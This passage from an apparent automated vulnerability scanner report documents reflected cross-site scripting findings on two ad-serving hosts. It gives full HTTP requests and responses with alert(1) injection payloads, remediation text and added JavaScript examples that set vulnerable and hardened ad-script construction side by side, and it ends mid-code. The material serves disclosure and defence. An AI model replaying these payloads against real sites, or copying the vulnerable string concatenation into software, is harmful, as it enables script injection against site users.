Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4825
Date: Sat, 14 May 2011 18:37:43 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
IGjhfIDYMmGhYmIpIQQoAH9pPvoA7IBDWRlYWxjdXJyeS5jb226AQozMDB4MjUwX2FzyAEJ2gEnaHR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA7eb9d"-alert(1)-"e1a6f9d16c7&num=1&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q&client=ca-pub-4949689067833404&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400189-240104510-42177866");
var wmode = "op
...[SNIP]...

6.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.121

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc2f3"-alert(1)-"4cadeb1bb5b was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.121;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BFPOLusvOTZa7EYr9lQfE7O3aCpOu__wBy-zLvBmb4YGjV4CIJxABGAEghqSwDDgAUIGjhfIDYMmGhYmIpIQQoAH9pPvoA7IBDWRlYWxjdXJyeS5jb226AQozMDB4MjUwX2FzyAEJ2gEnaHR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA&num=1&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q&client=ca-pub-4949689067833404dc2f3"-alert(1)-"4cadeb1bb5b&adurl=;ord=1730010217? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4949689067833404&output=html&h=250&slotname=9030308470&w=300&lmt=1305416201&flash=10.3.181&url=http%3A%2F%2Fdealcurry.com%2FVentureCapital.htm&dt=1305398201125&bpp=3&shv=r20110509&jsv=r20110506&prev_slotnames=9653691770&correlator=1305398201191&frm=0&adk=2109740475&ga_vid=1858156238.1305396356&ga_sid=1305398201&ga_hid=1376127525&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1004&bih=945&ref=http%3A%2F%2Fdealcurry.com%2F20110421-PolicyBazaar-Com-Raises-Rs-40-Cr-From-Intel-Cap-Info-Edge.htm&fu=0&ifi=2&dtd=855&xpc=nc6XXTzCiY&p=http%3A//dealcurry.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4813
Date: Sat, 14 May 2011 18:39:43 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
HR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA&num=1&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q&client=ca-pub-4949689067833404dc2f3"-alert(1)-"4cadeb1bb5b&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400189-240104510-42046964");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "fal
...[SNIP]...

6.4. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.121

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c54b2"-alert(1)-"928c7dc083b was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.121;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BFPOLusvOTZa7EYr9lQfE7O3aCpOu__wBy-zLvBmb4YGjV4CIJxABGAEghqSwDDgAUIGjhfIDYMmGhYmIpIQQoAH9pPvoA7IBDWRlYWxjdXJyeS5jb226AQozMDB4MjUwX2FzyAEJ2gEnaHR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA&num=1c54b2"-alert(1)-"928c7dc083b&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q&client=ca-pub-4949689067833404&adurl=;ord=1730010217? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4949689067833404&output=html&h=250&slotname=9030308470&w=300&lmt=1305416201&flash=10.3.181&url=http%3A%2F%2Fdealcurry.com%2FVentureCapital.htm&dt=1305398201125&bpp=3&shv=r20110509&jsv=r20110506&prev_slotnames=9653691770&correlator=1305398201191&frm=0&adk=2109740475&ga_vid=1858156238.1305396356&ga_sid=1305398201&ga_hid=1376127525&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1004&bih=945&ref=http%3A%2F%2Fdealcurry.com%2F20110421-PolicyBazaar-Com-Raises-Rs-40-Cr-From-Intel-Cap-Info-Edge.htm&fu=0&ifi=2&dtd=855&xpc=nc6XXTzCiY&p=http%3A//dealcurry.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4825
Date: Sat, 14 May 2011 18:38:19 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
DYMmGhYmIpIQQoAH9pPvoA7IBDWRlYWxjdXJyeS5jb226AQozMDB4MjUwX2FzyAEJ2gEnaHR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA&num=1c54b2"-alert(1)-"928c7dc083b&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q&client=ca-pub-4949689067833404&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400189-240104510-42177866");
var wmode = "opaque";
...[SNIP]...

6.5. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.121

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94eb7"-alert(1)-"66f0a0282ef was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.121;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BFPOLusvOTZa7EYr9lQfE7O3aCpOu__wBy-zLvBmb4YGjV4CIJxABGAEghqSwDDgAUIGjhfIDYMmGhYmIpIQQoAH9pPvoA7IBDWRlYWxjdXJyeS5jb226AQozMDB4MjUwX2FzyAEJ2gEnaHR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA&num=1&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q94eb7"-alert(1)-"66f0a0282ef&client=ca-pub-4949689067833404&adurl=;ord=1730010217? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4949689067833404&output=html&h=250&slotname=9030308470&w=300&lmt=1305416201&flash=10.3.181&url=http%3A%2F%2Fdealcurry.com%2FVentureCapital.htm&dt=1305398201125&bpp=3&shv=r20110509&jsv=r20110506&prev_slotnames=9653691770&correlator=1305398201191&frm=0&adk=2109740475&ga_vid=1858156238.1305396356&ga_sid=1305398201&ga_hid=1376127525&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1004&bih=945&ref=http%3A%2F%2Fdealcurry.com%2F20110421-PolicyBazaar-Com-Raises-Rs-40-Cr-From-Intel-Cap-Info-Edge.htm&fu=0&ifi=2&dtd=855&xpc=nc6XXTzCiY&p=http%3A//dealcurry.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4828
Date: Sat, 14 May 2011 18:39:03 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
5jb226AQozMDB4MjUwX2FzyAEJ2gEnaHR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA&num=1&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q94eb7"-alert(1)-"66f0a0282ef&client=ca-pub-4949689067833404&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400189-240104510-41904509");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess =
...[SNIP]...

6.6. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.121

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6347b"-alert(1)-"1b7e1897702 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

Note that in the request below the payload does not follow sz=300x250; it sits immediately after sa=l inside the click= URL that is embedded in the path, and it comes back inside the escape("...") string of the response. Read the scanner's parameter label against the request when reproducing this one; the reflected context is what matters.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.121;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l6347b"-alert(1)-"1b7e1897702&ai=BFPOLusvOTZa7EYr9lQfE7O3aCpOu__wBy-zLvBmb4YGjV4CIJxABGAEghqSwDDgAUIGjhfIDYMmGhYmIpIQQoAH9pPvoA7IBDWRlYWxjdXJyeS5jb226AQozMDB4MjUwX2FzyAEJ2gEnaHR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC-AEBuAIYwAIByAKLm-ERqAMB0QPYHYd97hHY_-gD1SfoA4kH6AMM6AMH6AObCfUDAAAAxA&num=1&sig=AGiWqtxTWxbTbD7IDVdxoP07yvsaQxID0Q&client=ca-pub-4949689067833404&adurl=;ord=1730010217? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4949689067833404&output=html&h=250&slotname=9030308470&w=300&lmt=1305416201&flash=10.3.181&url=http%3A%2F%2Fdealcurry.com%2FVentureCapital.htm&dt=1305398201125&bpp=3&shv=r20110509&jsv=r20110506&prev_slotnames=9653691770&correlator=1305398201191&frm=0&adk=2109740475&ga_vid=1858156238.1305396356&ga_sid=1305398201&ga_hid=1376127525&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1004&bih=945&ref=http%3A%2F%2Fdealcurry.com%2F20110421-PolicyBazaar-Com-Raises-Rs-40-Cr-From-Intel-Cap-Info-Edge.htm&fu=0&ifi=2&dtd=855&xpc=nc6XXTzCiY&p=http%3A//dealcurry.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4828
Date: Sat, 14 May 2011 18:37:13 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
rl = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/f/1a8/%2a/z%3B240104510%3B2-0%3B0%3B55400189%3B4307-300/250%3B41886722/41904509/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=l6347b"-alert(1)-"1b7e1897702&ai=BFPOLusvOTZa7EYr9lQfE7O3aCpOu__wBy-zLvBmb4YGjV4CIJxABGAEghqSwDDgAUIGjhfIDYMmGhYmIpIQQoAH9pPvoA7IBDWRlYWxjdXJyeS5jb226AQozMDB4MjUwX2FzyAEJ2gEnaHR0cDovL2RlYWxjdXJyeS5jb20vVmVudHVyZUNhcGl0YWwuaHRt4AEC
...[SNIP]...

6.7. http://ad.doubleclick.net/adj/india.reuters.com/widgets [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/india.reuters.com/widgets

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24831'-alert(1)-'e178f61f9c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/india.reuters.com/widgets;sz=234x60;ord=0.3587185984943062?&24831'-alert(1)-'e178f61f9c8=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 279
Date: Sat, 14 May 2011 18:05:34 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/l;44306;0-0;0;25434165;4-234/60;0/0/0;;~okv=;sz=234x60;;24831'-alert(1)-'e178f61f9c8=1;~aopt=2/0/b8/0;~sscs=%3f">
...[SNIP]...

6.8. http://ad.doubleclick.net/adj/india.reuters.com/widgets [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/india.reuters.com/widgets

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbbc0'%3balert(1)//f43036c0423 was submitted in the sz parameter. This input was echoed as fbbc0';alert(1)//f43036c0423 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. One caveat on this particular payload: the string is the argument of a document.write(...) call, so terminating it with '; and commenting out the rest of the line also comments out the call's closing parenthesis, which makes the whole script a syntax error rather than an alert. The '-alert(1)-' form used in 6.7 is the one that executes in this context; the reflection itself is identical.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/india.reuters.com/widgets;sz=fbbc0'%3balert(1)//f43036c0423 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 274
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 18:04:48 GMT
Expires: Sat, 14 May 2011 18:04:48 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/p;44306;0-0;0;25434165;39648-768/768;0/0/0;;~okv=;sz=fbbc0';alert(1)//f43036c0423;~aopt=2/0/b8/0;~sscs=%3f"><im
...[SNIP]...
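
The script-context findings above (6.4 to 6.8) all come from an ad server that builds a document.write('<a href="...">') call by concatenating request parameters into a quoted JavaScript string; 6.18 and 6.19 later in this report are the same pattern on another host. The following is an added example, not code from this page or from any of the ad servers it describes, that reproduces that construction and a hardened variant: the parameter is serialised as JSON with < and the U+2028/U+2029 line terminators escaped, and the client builds the anchor with DOM properties instead of HTML text. The function names, the ad.example host and the ;~sscs=%3f suffix are assumptions for the demonstration; the two payloads are the ones reported in 6.7 and 6.8.

```javascript
// Added example for findings 6.4-6.8 (and the script-context reflections in
// 6.18/6.19). Not code from ad.doubleclick.net; names and the ad.example host
// are assumptions for the demonstration.

// Vulnerable construction, shaped like the responses above: the request
// parameter is concatenated into a single-quoted JavaScript string that
// itself carries HTML, inside a document.write(...) call.
function buildAdScriptVulnerable(sz) {
  return "document.write('<a target=\"_top\" href=\"http://ad.example/click;sz=" +
    sz + ";~sscs=%3f\">ad</a>');";
}

// JSON that is safe to embed in a script body. JSON.stringify already escapes
// quotes, backslashes and control characters; '<' is escaped so "</script>"
// cannot terminate the block, and U+2028/U+2029 because they are legal in
// JSON strings but are line terminators in JavaScript source.
function jsonForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened construction: the parameter travels as data (JSON), the client
// builds the anchor with DOM properties so no parameter-derived text is ever
// parsed as HTML or as code, and the click target is restricted to http(s).
// The emitted script runs in a browser; document.currentScript locates the
// <script> element that delivered it.
function buildAdScriptHardened(sz) {
  const data = {
    href: 'http://ad.example/click;sz=' + encodeURIComponent(sz) + ';~sscs=%3f',
  };
  return 'var ad = ' + jsonForScript(data) + ';\n' +
    "var a = document.createElement('a');\n" +
    'a.target = "_top";\n' +
    'a.href = /^https?:\\/\\//.test(ad.href) ? ad.href : "about:blank";\n' +
    'a.textContent = "ad";\n' +
    'document.currentScript.parentNode.appendChild(a);';
}
```

Compiling the two outputs with new Function() is a quick way to check the point made under 6.8: the '-alert(1)-' payload yields a valid program that calls alert, the ';alert(1)// payload yields a SyntaxError inside document.write(...), and the hardened script treats both as an opaque href.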

6.9. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload f72d4<script>alert(1)</script>d9d1668cc15 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

The reflection happens inside the text of an unhandled java.lang.NumberFormatException, which the page writes into the <head> of the response: the non-numeric pid reaches an integer parser, the parser's message quotes the raw input, and that message is rendered without encoding. The same defect therefore also discloses internal exception text.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1517799&pid=2279769f72d4<script>alert(1)</script>d9d1668cc15&zw=125&zh=125&url=http%3A//www.stowetoday.com/stowe_reporter/news/business_news/article_df77e6de-7cac-11e0-93f2-001cc4c03286.html&v=5&dct=Tunes%2C%20tastes%20blend%20at%20Moog%E2%80%99s%20Place%20Tunes%2C%20tastes%20-rmont%20music%20scene%2C%20bartender%2C%20lincoln%20inn%2C%20brewski&metakw=tom%20moog,vermont%20music%20scene,bartender,lincoln%20inn,brewski,seth%20yacovone,eames%20brothers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.stowetoday.com/stowe_reporter/news/business_news/article_df77e6de-7cac-11e0-93f2-001cc4c03286.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 22:29:52 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 1638


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</style>
   
               
                           java.lang.NumberFormatException: For input string: "2279769f72d4<script>alert(1)</script>d9d1668cc15"

   
                                                           </head>
...[SNIP]...

6.10. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload fc0b1--><script>alert(1)</script>96d3cdd0333 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

As in 6.9, the carrier is a java.lang.NumberFormatException message, here placed in a comment at the top of the body. Two details of the response bear on exploitability: it is served with Content-Type: text/plain and without X-Content-Type-Options, so whether the --> breakout runs depends on the client sniffing the body as HTML; and it is a 200, so the failed parse is not even signalled as an error.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1517799fc0b1--><script>alert(1)</script>96d3cdd0333&pid=2279769&zw=125&zh=125&url=http%3A//www.stowetoday.com/stowe_reporter/news/business_news/article_df77e6de-7cac-11e0-93f2-001cc4c03286.html&v=5&dct=Tunes%2C%20tastes%20blend%20at%20Moog%E2%80%99s%20Place%20Tunes%2C%20tastes%20-rmont%20music%20scene%2C%20bartender%2C%20lincoln%20inn%2C%20brewski&metakw=tom%20moog,vermont%20music%20scene,bartender,lincoln%20inn,brewski,seth%20yacovone,eames%20brothers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.stowetoday.com/stowe_reporter/news/business_news/article_df77e6de-7cac-11e0-93f2-001cc4c03286.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 22:29:50 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3478
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "1517799fc0b1--><script>alert(1)</script>96d3cdd0333" -->
...[SNIP]...
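
Both adsonar findings (6.9 and 6.10) share one root cause: a non-numeric placementId or pid is handed to an integer parser, and the resulting java.lang.NumberFormatException message, which quotes the raw input, is written into the page (between tags in 6.9, inside an HTML comment in 6.10). The following is an added example, not the ad server's code, of the shape a fixed handler takes: validate the identifiers before anything parses them, answer bad input with a fixed message and a server-side reference rather than the value, and send the real content type with nosniff. The id format, the function names, the reference-id scheme and the sample requests are assumptions; the two bad values are the ones from the requests above.

```javascript
// Added example for findings 6.9 / 6.10. Not the ad server's code; the id
// format, function names and reference-id scheme are assumptions.

// An ad placement or publisher id is a positive decimal integer (assumed:
// 1 to 12 digits, no leading zero). Validate before anything parses it, so
// there is no NumberFormatException to leak and no raw value to echo.
const ID_RE = /^[1-9][0-9]{0,11}$/;
function parseId(raw) {
  if (typeof raw !== 'string' || !ID_RE.test(raw)) return null;
  return Number(raw);
}

// Shown for comparison only: entity encoding of '>' is what would stop "-->"
// from closing the comment in 6.10. The render path below does not rely on
// it, because request data has no business inside an HTML comment.
function encodeHtmlText(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Renders the slot. On bad input the client gets a fixed message and a
// server-generated reference; the offending values go to the log only.
function renderAdSlot(query, log = []) {
  const placementId = parseId(query.placementId);
  const pid = parseId(query.pid);
  if (placementId === null || pid === null) {
    const ref = 'err-' + (log.length + 1);
    log.push({ ref, placementId: query.placementId, pid: query.pid });
    return { ok: false, html: '<!-- ' + ref + ' -->\n<p>Invalid ad request.</p>' };
  }
  return {
    ok: true,
    html: '<div data-placement="' + placementId + '" data-pid="' + pid + '"></div>',
  };
}

// Full response: a real status code, the real content type and nosniff. The
// 6.10 response was a 200 served as text/plain with no X-Content-Type-Options,
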